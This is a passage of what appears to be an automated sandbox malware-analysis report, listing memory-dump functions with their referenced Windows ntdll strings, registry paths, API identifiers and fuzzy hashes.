                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                            • API String ID: 0-4192008846
                                                                                                                                                                                            • Opcode ID: 0065dcc1a7926eac82764590b8450fd4f613b90d7b3a439b9dce679fe1dcea44
                                                                                                                                                                                            • Instruction ID: 731202779986fb27172f1c3af92667c72b515b94e86ab69cc8f720ed1ccac5bb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0065dcc1a7926eac82764590b8450fd4f613b90d7b3a439b9dce679fe1dcea44
                                                                                                                                                                                            • Instruction Fuzzy Hash: 633138B5E01609AFDB10DF94DC80AEEBBBCEF44744F4404A9EA05EB241D7B49E44CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D21527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • minkernel\ntdll\ldrtls.c, xrefs: 33D6185B
                                                                                                                                                                                            • LdrpInitializeTls, xrefs: 33D61851
                                                                                                                                                                                            • DLL "%wZ" has TLS information at %p, xrefs: 33D6184A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                            • API String ID: 0-931879808
                                                                                                                                                                                            • Opcode ID: 9369acdedb0dbb8f9177d3b6bbc592beee87eb0cf09515c62ccec6dd4787587f
                                                                                                                                                                                            • Instruction ID: e0a4b0035692d2e684da070f5d84b784409823329fd1663130163324d1b67634
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9369acdedb0dbb8f9177d3b6bbc592beee87eb0cf09515c62ccec6dd4787587f
                                                                                                                                                                                            • Instruction Fuzzy Hash: F4312172A10310BFE7109B84CC85F5A7FB9AB85788F4540AAF546F7280EB70ED4587A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D31190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • @, xrefs: 33D311C5
                                                                                                                                                                                            • BuildLabEx, xrefs: 33D3122F
                                                                                                                                                                                            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 33D3119B
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                            • API String ID: 0-3051831665
                                                                                                                                                                                            • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                            • Instruction ID: 3119fcd6e963f1de840feb159422e8753a93adfb646bbea8a3ff956ce5169867
                                                                                                                                                                                            • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                            • Instruction Fuzzy Hash: 50319E76D0131ABFDB129BA4CC40EDEBBB9FB85664F004025E915E7260DB30DE059BA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D051C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: @$@
                                                                                                                                                                                            • API String ID: 0-149943524
                                                                                                                                                                                            • Opcode ID: 50512131f2ada53b57e1b46964568a460096e42d48cace34bcd0022042b7a2a6
                                                                                                                                                                                            • Instruction ID: 23adffaa81002ed14e572baa2a7db3301680406436a2cda0fafa86cb4994e757
                                                                                                                                                                                            • Opcode Fuzzy Hash: 50512131f2ada53b57e1b46964568a460096e42d48cace34bcd0022042b7a2a6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 74328BB85083118BEB24CF14C480B2EB7E6EF89F44F58492EF99597690EB74D944CF92
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF5622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3446177414-0
                                                                                                                                                                                            • Opcode ID: bee8f742314d2a68a8b1664b133a2e6663633195ebd12eb74700ffd36ce3dc3b
                                                                                                                                                                                            • Instruction ID: c94f01f61b41c667754d9d4903f34e3efd5874739e75f106d85040c557616cc8
                                                                                                                                                                                            • Opcode Fuzzy Hash: bee8f742314d2a68a8b1664b133a2e6663633195ebd12eb74700ffd36ce3dc3b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6831B035A02B02FFEB869F25CA40A8AFBB9BF44754F045015EA51C7F51DB75E821CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D79567 Relevance: 3.1, APIs: 2, Instructions: 62timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3446177414-0
                                                                                                                                                                                            • Opcode ID: 508f53108c0546827a6eca83bcd5e80d72e4a9ba2ea42670df561f30c7d905d0
                                                                                                                                                                                            • Instruction ID: d845feebe4a1ef88fad4c683bffebcc7c10f0ba8838e9bdb9371a2d05ce3695a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 508f53108c0546827a6eca83bcd5e80d72e4a9ba2ea42670df561f30c7d905d0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E1106B3B14265ABEB059F5CC984A6EBBFDEF886A0F15017DE406E3700DA709D01CB94
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D7174B Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: @$AddD
                                                                                                                                                                                            • API String ID: 0-2525844869
                                                                                                                                                                                            • Opcode ID: 05558ec96737f7c281727807b27fbff946f3edae830cd80e0bd110f11181c019
                                                                                                                                                                                            • Instruction ID: 192db1be646c77c8f5d85c425ee8e2314c4c56b3392ff36ed5bd41e55dc9087c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 05558ec96737f7c281727807b27fbff946f3edae830cd80e0bd110f11181c019
                                                                                                                                                                                            • Instruction Fuzzy Hash: 75A159B6508304AFE315CF14C845BABB7E9FF84B54F544B2EF99486250E770E909CB62
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D25BE0 Relevance: 2.7, Strings: 2, Instructions: 241COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: @$TargetPath
                                                                                                                                                                                            • API String ID: 0-4164548946
                                                                                                                                                                                            • Opcode ID: bae0ca7c2386dbd92491255605d7c79807d515024d2179b4234d097a9552b3d4
                                                                                                                                                                                            • Instruction ID: a5a8f1f4e15aee1c30fe870e7b734d218c0330a958b0e2264ef6aa9eeee98442
                                                                                                                                                                                            • Opcode Fuzzy Hash: bae0ca7c2386dbd92491255605d7c79807d515024d2179b4234d097a9552b3d4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 338111719043059FE711CF18C880A5BBBA9FB84B5CF89892DF895D7610E731DD49CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D7B890 Relevance: 2.7, Strings: 2, Instructions: 234COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: \REGISTRY\USER\$\Software\Microsoft\Windows
                                                                                                                                                                                            • API String ID: 0-4122831824
                                                                                                                                                                                            • Opcode ID: 2e3772100a9012e3b7f2726537d1dea4f3c1a0cc7756afaeb2cc8126e97637ef
                                                                                                                                                                                            • Instruction ID: a0b4d6b45d9878d2762fe67ee1929f6f37128f93dbf6d8e555881d5824275439
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e3772100a9012e3b7f2726537d1dea4f3c1a0cc7756afaeb2cc8126e97637ef
                                                                                                                                                                                            • Instruction Fuzzy Hash: 40918CB55047019FD311CF24C884BABB7E8FF88764F140A2EE9A9C7290EB34E945CB52
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D85930 Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Log$RXACT
                                                                                                                                                                                            • API String ID: 0-2401810139
                                                                                                                                                                                            • Opcode ID: e8d3c28d3af6179b53eef331ee9232ff5af2715de5363089894ee60dcb948835
                                                                                                                                                                                            • Instruction ID: 39c8386743aa47966f82bd6ca92a5a082d83efdda6527b1937bd6e61a5e02769
                                                                                                                                                                                            • Opcode Fuzzy Hash: e8d3c28d3af6179b53eef331ee9232ff5af2715de5363089894ee60dcb948835
                                                                                                                                                                                            • Instruction Fuzzy Hash: D7717A71909345AFE312CF54C880EABBBEDFF89654F044929F5849B260D771ED04CBA2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DCB55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • RedirectedKey, xrefs: 33DCB60E
                                                                                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 33DCB5C4
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                                                            • API String ID: 0-1388552009
                                                                                                                                                                                            • Opcode ID: 18836e8b2c0d46bd2ef1314ce99636d518b47dc0c6efee03429e93bce515431f
                                                                                                                                                                                            • Instruction ID: c87e916736f2e895025e071687bb8fff1e4dc5de4e988317a951bfad9e49c6e6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 18836e8b2c0d46bd2ef1314ce99636d518b47dc0c6efee03429e93bce515431f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3961E1B5C50259EFDB11DF94C888ADEBFB9FB48B10F54406AF805A7240D7749A46CFA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D0F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: $$$
                                                                                                                                                                                            • API String ID: 3446177414-233714265
                                                                                                                                                                                            • Opcode ID: 0389d44c27f33c9fb4f9ea22a0517dd03f74b16bb94d3c344743cb96e4ee3249
                                                                                                                                                                                            • Instruction ID: e21b7af602bd030ee69b0660ee9b07161960f05b86af82e33ff7555d22b44355
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0389d44c27f33c9fb4f9ea22a0517dd03f74b16bb94d3c344743cb96e4ee3249
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3561CCB5E00749CFEB21CFA4C580B9DB7BABF44B04F244169E155AFA80CB75A941CF90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D8314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                            • API String ID: 0-118005554
                                                                                                                                                                                            • Opcode ID: ca93df2478bfd6519982c2c9db131bdc67172680e414cf7865c2823f15174d4e
                                                                                                                                                                                            • Instruction ID: a991f26b2babcb42fce19d8bb48dc66f1764c5eda374911c625c30fe8b554a2f
                                                                                                                                                                                            • Opcode Fuzzy Hash: ca93df2478bfd6519982c2c9db131bdc67172680e414cf7865c2823f15174d4e
                                                                                                                                                                                            • Instruction Fuzzy Hash: E831D0796097419BD301CF68D840B1AB7E8FF85B50F440869F858CFB90EB31EA05CB62
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D231BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: .Local\$@
                                                                                                                                                                                            • API String ID: 0-380025441
                                                                                                                                                                                            • Opcode ID: a05ecf634412fadf88f868e4840d5557f63dc0b21870476af26d42f3f7bc6de5
                                                                                                                                                                                            • Instruction ID: e63d470e10c814afaa349c5df04920629e24e27863b9c2eb0307ab0dfe26bac6
                                                                                                                                                                                            • Opcode Fuzzy Hash: a05ecf634412fadf88f868e4840d5557f63dc0b21870476af26d42f3f7bc6de5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B314EB5949305AFD311DF28C980A5BBFE8FF85658F44092EF9D4C3A50D634DE098BA2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D233D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • RtlpInitializeAssemblyStorageMap, xrefs: 33D6289A
                                                                                                                                                                                            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 33D6289F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                                                            • API String ID: 0-2653619699
                                                                                                                                                                                            • Opcode ID: 16ee5de2d120f20dbaa93e805f7e60d14de49613f1384e9f634bd8beef2be401
                                                                                                                                                                                            • Instruction ID: 20518f04d68d1f24dc75c61c1a2718b3c6cf6d65ddc447a063f728216294a564
                                                                                                                                                                                            • Opcode Fuzzy Hash: 16ee5de2d120f20dbaa93e805f7e60d14de49613f1384e9f634bd8beef2be401
                                                                                                                                                                                            • Instruction Fuzzy Hash: E1112972F04305BFE7158E58CD41F5B7BA9DB84B58F64806AB904EB644DA78CD0186A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF1051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3446177414-0
                                                                                                                                                                                            • Opcode ID: 24349f2dd90f08b697cbc203e03c36ed0795eb3a43b4c55f0e2d35708e0e0f84
                                                                                                                                                                                            • Instruction ID: 7fd6c44b5e8c76ad9f492b0275fbe29ec9ab5767daf8254eb95fb61fd8d4112c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 24349f2dd90f08b697cbc203e03c36ed0795eb3a43b4c55f0e2d35708e0e0f84
                                                                                                                                                                                            • Instruction Fuzzy Hash: DEB114B59093808FD354CF28C480A5AFBF5BF88704F188A6EE899DB351D731E945CB52
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D755E0 Relevance: 1.7, APIs: 1, Instructions: 246COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: 379f751fdc39b278790bca9075cfc752f17a185727d73b779577782f015addd6
                                                                                                                                                                                            • Instruction ID: bd11413e70da9fe0ff8754445e4a7b207d7bca06786b157b170ce191ddf06500
                                                                                                                                                                                            • Opcode Fuzzy Hash: 379f751fdc39b278790bca9075cfc752f17a185727d73b779577782f015addd6
                                                                                                                                                                                            • Instruction Fuzzy Hash: AC814E75E01309ABDB21DFA5CC80EAFBBFDAF49720F100529E555A7690DA70ED04CBA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF7623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4106aa5316a22c338f010bc06d33ce244050d5c97021e6a78bef3c5504d10617
                                                                                                                                                                                            • Instruction ID: 2639a41c6fbe161ca30046acf364fc7180c985905ea7ea5690eae13e2584cf60
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4106aa5316a22c338f010bc06d33ce244050d5c97021e6a78bef3c5504d10617
                                                                                                                                                                                            • Instruction Fuzzy Hash: 31617D75E10606AFDB49DF79C480A9DFBB5BF88780F24826EE419E7300DB35A9418F90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CEB420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
